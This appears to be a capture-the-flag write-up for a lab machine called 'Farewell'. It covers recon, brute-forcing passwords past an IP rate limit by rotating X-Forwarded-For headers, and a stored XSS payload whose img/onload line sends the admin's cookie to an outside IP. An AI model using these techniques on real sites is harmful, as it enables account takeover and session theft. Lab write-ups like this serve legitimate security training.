Farewell
Farewell
๐ Recon
First, I ran an nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-25 13:58 UTC
Nmap scan report for ip-10-82-129-222.eu-west-1.compute.internal (10.82.129.222)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 9e:fe:2f:f9:3c:82:7e:58:aa:ea:1c:fa:2e:fa:33:11 (ECDSA)
|_ 256 18:dd:d6:b2:8c:1a:fa:0f:b3:96:1e:87:95:fc:15:42 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Farewell โ Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
So itโs all web-based as expected. I ran feroxbuster next:
1
feroxbuster -u http://10.82.129.222/ -x php,html,txt -a "Mozilla/5.0 (Linux; Android 12; PSD-AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"
๐ต๏ธ Auth Page & User Enumeration
๐ก This is the page โ you can see a notification bar at the top showing usernames:
1
2
3
adam posted a message - 3 hrs ago
deliver11 posted a message - 4 hrs ago
nora posted a message - 1 day ago
I tried logging in since the request goes to auth.php as seen in the recon: 
๐ It gives a hint for each user. The site also checks the IP, meaning weโre limited to 10 attempts per IP. To bypass this, we can use the X-Forwarded-For header, but we need to rotate IPs. Here are the password hints:
1
2
3
adam - favorite pet + 2 digits
deliver11 - Japan followed by 4 digits
nora - lucky number 789
โก Brute Force with IP Rotation
I generated a list of IPs using Python:
1
2
3
4
5
for num1 in range(0, 5):
for num2 in range(1, 255):
with open('ip.txt', 'a') as file:
for i in range(0, 9):
file.write(f'127.0.{num1}.{num2}\n')
And for the password wordlist:
1
crunch 9 9 numeric -t Tokyo%%%% > word.txt
๐ป I used Caido for the brute force: 
I found the password โ filter by response length and retry any rejected requests: 
And found the first flag!
๐ Admin Flag
๐ I noticed comments getting approved on the page, so I tried XSS: 
As expected, normal tags donโt work. Letโs try to bypass the filter:
1
<img src='http://192.168.131.95:8080/test'>
โก It works! Now letโs steal the admin cookie. I used a technique similar to other challenges:
1
<body onload="new Image().src='http://192.168.131.95:8888?x='+document['coo'+'kie']">
๐ ๏ธ Now logged in as admin. I remembered from the recon that there was an admin.php โ letโs check it: 
๐ And now I got the real admin flag!






